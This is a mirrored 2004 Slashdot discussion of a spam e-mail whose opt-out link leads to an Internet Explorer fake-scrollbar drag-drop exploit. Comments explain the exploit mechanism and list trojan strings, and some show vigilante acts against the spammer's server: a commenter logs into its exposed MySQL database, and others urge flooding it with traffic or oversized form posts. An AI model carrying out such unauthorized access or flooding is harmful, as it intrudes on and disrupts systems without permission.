Slashdot Mirror

← Back to Stories (view on slashdot.org)

Spam Opt-out Link Triggers Malicious Code Attack

Posted by timothy on from the how-totally-amazing dept.

Maestro4k writes "The Register is reporting on a new spam E-mail circulating out there. In it, clicking on the 'Click here to remove' link launches a site, that when the user scrolls the page, triggers a drag-drop javascript exploit. Scarily the E-mail actually complies with the CAN-SPAM act as it only requires spammers to put an opt-out link in their mailings. As The Reg says "It comes as little surprise that this feature is been taken advantage of in a social engineering exploit; but it does illustrate the security problems of the opt-out approach that were always apparent to security experts - and ignored by legislators." The link in questions points to www. xcelent.biz (As in The Reg story, space intentionally included) so even if you can't block the mail yet it should be easy to block access to the site with the exploit. I suspect this is just the beginning and most spam will include "features" such as this in the near future."

30 of 327 comments (clear)

  1. devious by hendridm · · Score: 4, Informative

    Fortunately, there is a patch for it, Mozilla is unaffected, and Norton and McAfee (at minimum) seem to detect it. That just leaves the millions of unpatched Windows machines that are running out-dated or low-grade antivirus!

  2. Microsoft says "No Problem" by Anonymous Coward · · Score: 5, Funny
    Don't worry, this isn't a real problem:
    "Given the significant amount of user action required to execute an attack, Microsoft does not consider this to be a high risk for customers," a company representative said, adding that the software giant's security experts are continuing to research the issue.

    I mean, using a scrollbar. Come on, what kind of ignorant user is going to use a scrollbar an a site they don't trust? ;-)
    1. Re:Microsoft says "No Problem" by Anonymous Coward · · Score: 5, Informative

      Here is the pertinent CERT advisory for this flaw.

      The idea is that all the website designer has to do is make an image that LOOKs like a scrollbar. The user goes and clicks and drags it to scroll down, not knowing it's fake. If there is a DYNSRC="..." attribute specified in the <IMG...> tag, Internet Explorer downloads and runs whatever program is specified, without any kinds of prompts whatsoever.

      Even with SP2 installed.

    2. Re:Microsoft says "No Problem" by bheerssen · · Score: 5, Interesting

      Yep, exactly right.

      For the curious, here is an interesting post that describes the exploit at some length. Essentially, it uses an HTML 'dynsrc' attribute (proprietary Microsoft extension) to allow IE to download the executable, and javascript to use the 'shell:' protocol to execute it. It's not a particularly new flaw, but this is the slickest exploit of it I've seen.

      --
      (Score: -1, Stupid)
  3. I dont know about you by OverlordQ · · Score: 4, Informative
    but my AntiVirus has detected this exploit for a *long* time.

    JS/Exploit-DragDrop.b.gen
    --
    Your hair look like poop, Bob! - Wanker.
    1. Re:I dont know about you by orangesquid · · Score: 4, Informative

      A simple string analysis of the trojan reveals some intimidating-looking strings:
      GetSystemDirectoryA, xProxyBot v 1.0.0, 1.0.0 , w32.exe,
      Windows Service Application, www.earthlabs.biz,
      sockproxy/rec.php.
      Software\M icrosoft\Windows\ CurrentVersion\Run
      Software\Microsoft\Windows\ CurrentVersion\RunServices
      %s?&p=%d&v=%s
      VisitWe bPageThread , Socket4RandomThread, Socket4ServerThread
      SYSTEM\CurrentControlSet\ Control\SafeBoot\
      explorer.exe
      Mozilla/4.0 (compatible)
      InternetCloseHandle, InternetGetLast ResponseInfoA
      InternetReadFile , InternetCrackUrlA
      InternetOpenUrlA
      InternetOpenA , InternetConnectA
      FtpPutFileA, FtpGetFileA
      HttpSendRequestA, HttpOpenRequestA
      InternetGet ConnectedStateEx, InternetGetConnected State

      --
      --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
  4. Greeting from Malaysia by politicsie04 · · Score: 5, Funny

    Whois says that the website is operated by Anandan Krishan from Malaysia, so lets all send him an email, win2save@yahoo.com , complaining that he has discrimnated against Firefox, and Linux users of his website, and that in future he should have a more inclusive virus.

  5. Dumb by sl8r · · Score: 5, Funny
    Also, the programmer seems to have had fun writing the javascript on that xcelent.biz page. From the source:
    // probably the dumbest scrollbar emulation on this planet ;)
    1. Re:Dumb by Benanov · · Score: 5, Informative

      That comment means it was ripped from a proof-of-concept website published a while ago: http://www.mikx.de/scrollbar/ Amazingly shameless. They stole this guy's code, AND they're using it for phishing attacks.

  6. Why is the site still up? by jarich · · Score: 4, Insightful
    The article says they know the name of the website... why is it still there? Why is the EXE still available?

    I realize that another spammer will take advantadge of the hole next week but if the hosters were blacklisted from DNS servers, the offending files might get removed a little faster.

    --
    Agile Artisans
    1. Re:Why is the site still up? by gorbachev · · Score: 5, Funny

      Two possible reasons:

      1. Law enforcement agencies asked to keep it up

      2. Hinet Taiwan doesn't give a shit

      I'm betting on option #2.

      --
      In Soviet Russia, I ruled you
  7. Useful slashdotting!! by Evan+Meakyl · · Score: 4, Funny

    The link in questions points to www. xcelent.biz (As in The Reg story, space intentionally included)

    There should be a real link, in order to /. it!!!

  8. Use your powers for good by Mignon · · Score: 4, Interesting

    Why don't we non IE-users use the Slashdot effect for good? Let's all visit the evil site and soon it will be a steaming pile of rubble.

    1. Re:Use your powers for good by ElNeo · · Score: 5, Funny

      Like this nice link?
      (click link below to show link...)

  9. New News? by Kartik3 · · Score: 5, Informative

    Spammers have often used an "unsubscribe" link or something similar only to verify your email address and send you more spam. While not the same as triggering an exploit, I've been under the impression that spammers have taken advantage of users with an "opt out" type of link in this way for quite a while now.

  10. lamer is hosted on hinet.com by Indy1 · · Score: 4, Informative

    host www.xcelent.biz
    www.xcelent.biz has address 61.218.79.53
    host 61.218.79.53
    53.79.218.61.in-addr.arpa domain name pointer 61-218-79-53.HINET-IP.hinet.net

    and people wonder why i firewall 60/7

    --
    Lawyers, MBA's, RIAA? A jedi fears not these things!
  11. Exploit by jargoone · · Score: 5, Informative

    The article didn't give much explanation about the drag-and-drop exploit itself. Understandably, given the audience, but I was curious. Here's a good link: http://xforce.iss.net/xforce/xfdb/13679

  12. interesting ports on the spammer's site by Indy1 · · Score: 5, Interesting

    Starting nmap 3.70 ( http://www.insecure.org/nmap/ ) at 2004-09-22 09:54 MDT
    Interesting ports on 61-218-79-53.HINET-IP.hinet.net (61.218.79.53):
    (The 1651 ports scanned but not shown below are in state: closed)
    PORT STATE SERVICE
    21/tcp open ftp
    22/tcp open ssh
    80/tcp open http
    111/tcp open rpcbind
    135/tcp filtered msrpc
    443/tcp open https
    445/tcp filtered microsoft-ds
    3306/tcp open mysql
    6000/tcp open X11

    Nmap run completed -- 1 IP address (1 host up) scanned in 54.453 seconds

    --
    Lawyers, MBA's, RIAA? A jedi fears not these things!
    1. Re:interesting ports on the spammer's site by caluml · · Score: 5, Interesting

      bash-2.05b$ mysql -h 61-218-79-53.HINET-IP.hinet.net
      Welcome to the MySQL monitor. Commands end with ; or \g.
      Your MySQL connection id is 658 to server version: 3.23.54

      Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

      mysql> show databases;
      +-----------------+
      | Database |
      +-----------------+
      | earth_bizzads |
      | herbalmarketing |
      | mysql |
      +-----------------+
      3 rows in set (0.45 sec)

      mysql>

      --
      Get your own free personal location tracker
    2. Re:interesting ports on the spammer's site by ravydavygravy · · Score: 4, Funny
      Heh - this is what it looked like a few minutes ago...
      mysql> use test;
      Database changed
      mysql> show tables;
      +----------------+
      | Tables_in_test |
      +----------------+
      | SPAMMERS_SUX0r |
      | w00t |
      +----------------+
      2 rows in set (0.84 sec)
  13. Re:Another good reason... by Anonymous Coward · · Score: 4, Funny

    ..to get SpamAssassin.

    No. A good reason to hire a Spammer Assassin,
    perhaps.

    Violent, painful death is, after all, the only thing these sleaseballs fear.

  14. Re:More Legislation Needed. by stratjakt · · Score: 5, Insightful

    There's nothing legal about this.

    It's not specifically illegal under the CAN-SPAM act, but it's just as illegal as any other exploit, trojan or worm.

    --
    I don't need no instructions to know how to rock!!!!
  15. Even better - choose a link with graphics on. by cliveholloway · · Score: 4, Informative
    After a little guessing:

    a b c d. "d" looks pretty heavy on graphics.

    .02

    cLive ;-)

    --
    -- Trinity in high heels carrying a whip: The donimatrix - there is no spoonerism
  16. Why is this a surprise? by mykepredko · · Score: 4, Insightful

    Seriously.

    It's not like spammers are a class of people to be trusted. I always felt the opt-out requirement was joke and prime for abuse. By opting out, you are telling the spammer that you read every email that comes your way and they add it to their list of email addresses that actually respond to spam.

    So what do they do with this list? If they follow the letter of the law, they will stop spamming - but, they have a list of high quality email IDs that they can sell to other spammers.

    Users should always follow these simple instructions with regards to email spam:

    1. Make sure you have an incoming mail spam filter, like SpamAsassin.
    2. Delete any spam that gets through.
    3. If you are interested in the product, do not contact the email (spam) source, reply to the email, click on "helpful" buttons. Find reputable mainstream vendors - if it's great then Wal-Mart, Best Buy, Circuit City, etc. will stock it.

    myke

    --
    Mimetics Inc. Twitter
  17. Other sites on same server doing the same thing. by Chatmag · · Score: 4, Informative

    There is a slew of sites on that same server according to Webhosting Info that are infected, some with windows-update.exe and others with windows-update32.exe

    --
    Pete Carr Owner Chatmag.com
  18. But then again . . . by harley_frog · · Score: 5, Insightful

    it is a site worthy of a good slashdotting, if just to keep the unwary from reaching it.

    --
    It's all fun and games until someone loses the key to the handcuffs.
    1. Re:But then again . . . by mdfst13 · · Score: 5, Informative

      http://www.xcelent.biz/d/ is a link to another page in that domain. Also has more graphics for better slashdotting potential.

      P.S. Still be careful. They could always move the pages around.
  19. Hazardous link by abb3w · · Score: 4, Informative
    Now, now, there might be someone who might go to that page with IE. However, no doubt the Slashdot community would be interested in attempting their own effort at reverse engineering the trojan that they want you to download.

    Of course, anyone who installs that on a non-isolated, non-virtual machine pretty much deserves the results. It looks like it has the standard "Software\Microsoft\Windows\Current Version\Run", "Software\Microsoft\Windows\Current Version\RunServices", and "SYSTEM\CurrentControlSet\Control\SafeBoot\" registry hooks. (Unix "strings" is your friend....)

    --
    //Information does not want to be free; it wants to breed.
  20. Re:More Legislation Needed. by gcaseye6677 · · Score: 4, Insightful

    The government could crack down on most spam sources anytime they feel like taking the problem seriously. With all the business, tax code, interstate commerce, and other regulations on the books already, any spammer is bound to be violating a bunch of existing laws. And since many spamvertized products and services are fraudulent or blatantly illegal, simply prosecuting with traditional laws would be adequate.

    If the IRS started auditing every known spammer with operations or residence in the United States, that would have a very chilling effect on spam. I'd bet my life savings that spammers don't report all of their income for tax purposes. If other countries then followed suit, spam would be relegated to the far corners of the world and easily firewalled.

  21. Fill his database by caffeine_monkey · · Score: 4, Interesting

    It looks like he's not checking the field length of that "email addr" input before inserting it into the DB, so it should be a simple matter for someone to write a script to continuously loop through a POST to http://61.218.79.53/o/cgi-bin/removeme.cgi with a large amount of data in the field name "email". If a few people do this, his DB should fill up pretty quick.